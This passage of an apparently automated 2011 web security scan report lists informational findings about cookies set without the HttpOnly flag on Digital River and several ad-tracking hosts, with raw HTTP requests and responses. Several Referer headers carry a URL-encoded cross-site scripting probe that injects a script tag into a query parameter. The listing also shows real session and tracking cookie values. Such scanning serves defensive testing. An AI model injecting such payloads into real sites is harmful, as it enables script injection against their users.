Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3573678346.260.0000; path=/

GIF89a..........www......NNN......lllbbbXXX..................................................................!.......,...........`..di.h..l..p,.t..v..|....pH,....r.l:...tJ.Z...v..z...xL..&..y.~A$...Q2
...[SNIP]...

10.40. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonMarketing.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonMarketing.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-drh-dc1pod5-pool1-active=3573678346.260.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonMarketing.gif HTTP/1.1
Host: corporate.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Sun, 14 Feb 2016 05:20:10 GMT
ETag: "3d2-4bd96edf"
Content-Type: image/gif
Last-Modified: Thu, 29 Apr 2010 11:34:55 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=2650;ecid=101169091722,0)
Content-Length: 978
Date: Sun, 13 Feb 2011 23:20:10 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app57
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3573678346.260.0000; path=/

GIF89a..........www......NNNlllbbb......XXX..................................................................!.......,...........`..di.h..l..p,.t..v..|....pH,....r.l:...tJ.Z...v..z...xL..&..y.~A$...Q:
...[SNIP]...

10.41. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonPayment2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonPayment2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-drh-dc1pod5-pool1-active=3523346698.260.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonPayment2.gif HTTP/1.1
Host: corporate.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 28 Jul 2016 05:25:44 GMT
ETag: "410-4c602852"
Content-Type: image/gif
Last-Modified: Mon, 09 Aug 2010 16:09:54 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (G;max-age=3600+360;age=0;ecid=23859680048,0)
Content-Length: 1040
Date: Thu, 28 Jul 2011 23:25:44 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app54
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3523346698.260.0000; path=/

GIF89a..........wwwccc......lll...bbbNNNXXX...................................................~~~............uuu........................................................................................
...[SNIP]...

10.42. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/software.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/DRHM/Storefront/Site/digriv/pb/images/HomePage/software.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-drh-dc1pod5-pool1-active=1224868106.260.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/digriv/pb/images/HomePage/software.jpg HTTP/1.1
Host: corporate.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 26 May 2016 01:50:44 GMT
ETag: "3139-4bd96deb"
Content-Type: image/jpeg
Last-Modified: Thu, 29 Apr 2010 11:30:51 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=2986;ecid=135528829764,0)
Content-Length: 12601
Date: Thu, 26 May 2011 19:50:44 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app58
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=1224868106.260.0000; path=/

......JFIF.....d.d......Ducky.......d.....&Adobe.d...........
...C......!...17.........................................................................................................................
...[SNIP]...

10.43. http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery-1.3.2.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery-1.3.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-drh-dc1pod5-pool1-active=3288465674.260.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery-1.3.2.min.js HTTP/1.1
Host: corporate.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Tue, 16 Aug 2016 01:32:35 GMT
ETag: "dfa6-4acf682f"
Content-Type: application/x-javascript
Last-Modified: Fri, 09 Oct 2009 16:43:27 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=4667;ecid=135528826735,0)
Content-Length: 57254
Date: Tue, 16 Aug 2011 19:32:35 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app52
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3288465674.260.0000; path=/

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...

10.44. http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.easing.1.3.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.easing.1.3.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-drh-dc1pod5-pool1-active=1241645322.260.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.easing.1.3.js HTTP/1.1
Host: corporate.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Wed, 10 Aug 2016 07:26:18 GMT
ETag: "1fa1-4acf682f"
Content-Type: application/x-javascript
Last-Modified: Fri, 09 Oct 2009 16:43:27 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=6443;ecid=23859680067,0)
Content-Length: 8097
Date: Thu, 11 Aug 2011 01:26:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app59
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=1241645322.260.0000; path=/

/*
* jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/
*
* Uses the built in easing capabilities added In jQuery 1.1
* to offer multiple easing options
*
* TERMS OF USE - jQuery Easi
...[SNIP]...

10.45. http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox-1.2.1.pack.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox-1.2.1.pack.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-drh-dc1pod5-pool1-active=3523346698.260.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox-1.2.1.pack.js HTTP/1.1
Host: corporate.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 28 Jul 2016 05:25:44 GMT
ETag: "206f-4acf682f"
Content-Type: application/x-javascript
Last-Modified: Fri, 09 Oct 2009 16:43:27 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=2758;ecid=23859677436,0)
Content-Length: 8303
Date: Thu, 28 Jul 2011 23:25:44 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app54
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3523346698.260.0000; path=/

/*
* FancyBox - simple and fancy jQuery plugin
* Examples and documentation at: http://fancy.klade.lv/
* Version: 1.2.1 (13/03/2009)
* Copyright (c) 2009 Janis Skarnelis
* Licensed under the MIT
...[SNIP]...

10.46. http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox.css HTTP/1.1
Host: corporate.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Wed, 20 Apr 2016 13:06:59 GMT
ETag: "1722-4acf682f"
Content-Type: text/css
Last-Modified: Fri, 09 Oct 2009 16:43:27 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=2882;ecid=101169082540,0)
Content-Length: 5922
Date: Thu, 21 Apr 2011 07:06:59 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; path=/

html, body {
   height: 100%;
}

div#fancy_overlay {
   position: absolute;
   top: 0;
   left: 0;
   width:920px;
   height: 500px;
   background-color: #666;
   display: none;
   z-index: 30;
}

div#fancy_wrap {
   tex
...[SNIP]...

10.47. http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-drh-dc1pod5-pool1-active=1224868106.260.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/swfobject.js HTTP/1.1
Host: corporate.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 26 May 2016 01:50:40 GMT
ETag: "27ec-4acf63de"
Content-Type: application/x-javascript
Last-Modified: Fri, 09 Oct 2009 16:25:02 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=634;ecid=135528826721,0)
Content-Length: 10220
Date: Thu, 26 May 2011 19:50:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app58
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=1224868106.260.0000; path=/

/* SWFObject v2.2 <http://code.google.com/p/swfobject/>
is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
var swfobject=function(){var D="undefined",r="objec
...[SNIP]...

10.48. http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/store/digriv/html/pbPage.Homepage

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; expires=Mon, 03-Sep-2012 20:05:58 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/digriv/html/pbPage.Homepage HTTP/1.1
Host: corporate.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145843969; fcR=http%3A//www.digitalriver.com/; fcPT=http%3A//corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home; fcC=X=C708273219&Y=1315145843991&FV=10&H=1315145843969&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=0&E=5035601&F=0&I=1315145844054

Response

HTTP/1.1 301 Moved Permanently
Location: http://reservoir.marketstudio.net/reservoir?d=http%3A%2F%2Fcorporate.digitalriver.com%2Fstore%2Fdigriv%2Fhtml%2FpbPage.Homepage%3Fresid%3D__RESID__%26rests%3D1315145806740&t=commerce&p=globalcommerce&p1=digriv&p2=38938839926&p3=newsession
Content-Type: text/plain
Set-Cookie: VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; expires=Mon, 03-Sep-2012 20:05:58 GMT; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=126938593912,0)
Content-Length: 0
Date: Sun, 04 Sep 2011 14:16:46 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app53

10.49. http://corsec.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corsec.com
Path:	/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

9ca323ac0910e4bddd084377d75dc269=ba8a998b992f92c78ef14631d1e71609; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: corsec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:06 GMT
Server: Apache
Set-Cookie: 9ca323ac0910e4bddd084377d75dc269=ba8a998b992f92c78ef14631d1e71609; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:00:06 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: PleskLin
Connection: close
Content-Type: text/html
Content-Length: 19515

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...

10.50. http://devirusare.com/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://devirusare.com
Path:	/x26amp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bb2_screener_=1315144803+50.23.123.106; path=/
wpgb_visit_last_php-default=1315144803; expires=Mon, 03-Sep-2012 14:00:03 GMT; path=/
546900147=282444786

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x26amp HTTP/1.1
Host: devirusare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.51. http://forms.maas360.com/go/fiberlink/webinar_iPhone_HS previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forms.maas360.com
Path:	/go/fiberlink/webinar_iPhone_HS

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

55=1411120609; Expires=Sat, 11-Sep-2021 14:00:16 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/fiberlink/webinar_iPhone_HS HTTP/1.1
Host: forms.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:16 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Set-Cookie: 55=1411120609; Expires=Sat, 11-Sep-2021 14:00:16 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns=
...[SNIP]...

10.52. http://go.techtarget.com/clicktrack-r/activity/activity.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://go.techtarget.com
Path:	/clicktrack-r/activity/activity.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

co=%7B%22countryId%22%3A%22UNKNOWN%22%2C%22id%22%3A%22UNKNOWN%22%2C%22f2000%22%3A%22UNKNOWN%22%2C%22empSizeId%22%3A%22UNKNOWN%22%2C%22empSize%22%3A%22UNKNOWN%22%2C%22f1000%22%3A%22UNKNOWN%22%2C%22revenueId%22%3A%22UNKNOWN%22%2C%22industryId%22%3A%22UNKNOWN%22%2C%22industry%22%3A%22UNKNOWN%22%2C%22dbSic%22%3A%22UNKNOWN%22%2C%22type%22%3A%22UNKNOWN%22%2C%22revenue%22%3A%22UNKNOWN%22%7D; domain=.techtarget.com; path=/; expires=Sat, 03-Dec-2011 12:15:14 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.53. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sgm=7435=734382&7980=734355&7596=734356&8629=734382&6376=734377&508=734383; domain=.interclick.com; expires=Sat, 04-Sep-2021 12:27:21 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.54. http://idgenterprise.112.2o7.net/b/ss/computerworldcom/1/H.20.3/s25338357510045 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idgenterprise.112.2o7.net
Path:	/b/ss/computerworldcom/1/H.20.3/s25338357510045

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_sx7Fx7Dx60edubgx7Fbx7Ctsx7Fx7D=[CS]v4|2731C23B05160255-400001832002EC87|4E6383B7[CE]; Expires=Fri, 2 Sep 2016 14:00:22 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.55. http://kaplab.netmng.com/pixel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kaplab.netmng.com
Path:	/pixel/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

evo5=y9dly9jlztlwn%7CG2qCZKSW8tqIXW1OFjBNOfqDRwEEwkfNaOwDF%2FyU4Lo1Ltew3WXj21QSrslqQm7tahZ3dgaB5w403uJTNF9y22IO2aTcPgE%2BnUZIQtb7RPpNYgW2AhSYsvjc7joKqgi3R0Veb5F%2FhWoQwrdVgOBpSyAxl94dcNrNhlTsrJsldjjNySW361HGl8YRSNPkx7v1l9XQdG%2Fqop7DKqcyrGuuYrviAyh8fj8cULJLFrxiCyBs%2FHiEO969m3yJGazRZ8rLD0aq%2F7Eenc1CUN2yc1Suj7sgA3XwZgvBWpf4r1483PkMdgltAvHLAecQh%2FePPhaHDiExlxFGUIf17zGs8XV4V%2FStoEy0VzzNJiPkKSJ%2B8QfVKObBfXgbHQ%2B0ShJR591%2B; expires=Mon, 05-Mar-2012 12:27:22 GMT; path=/; domain=.netmng.com
evo5=y9dly9jlztlwn%7CJY%2BmeTt6iwt3MBIN8460Cj6P25CFyUyaafcp8uQt1uSK%2ByJCAdUop4ZtlWAm7SmS%2B%2FDrxyTJpwKpaPel07TNe85F7pyXNgy3XMLNxEdlK26a2XaRkJuEiO3GAmBI3IVAYnuXG1tWbwU1dsmmMgq45L%2Fr%2FWftzXCO9z3Eh4%2B36d%2Bo5oMeesb6FIsNm7aV191oBD6NTwyH8dnzeA1UepFT%2FJAauhyUfIHW83VCPXTWyP0S%2FefowWdYnh7HL1%2BJZc2v6OIFMsoP0K4M4xx9lGRSnE3UN%2FhS6QJB5EQ8RUrotrHC9%2FEDFCwhwZANtw4Pct8FNH3eu5Ou%2BnMWeXaowWLuANtgPRfmQMdP0Kt2HugMFoRS7SabR5hKXPfSfN1HpOZmRr0lar3v9ovrGjoH1yLd4m8laqPjvASyEUwyC%2BNVGkU%3D; expires=Mon, 05-Mar-2012 12:27:22 GMT; path=/; domain=.netmng.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.56. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACID=optout!; domain=advertising.com; expires=Tue, 03-Sep-2013 12:18:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.57. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

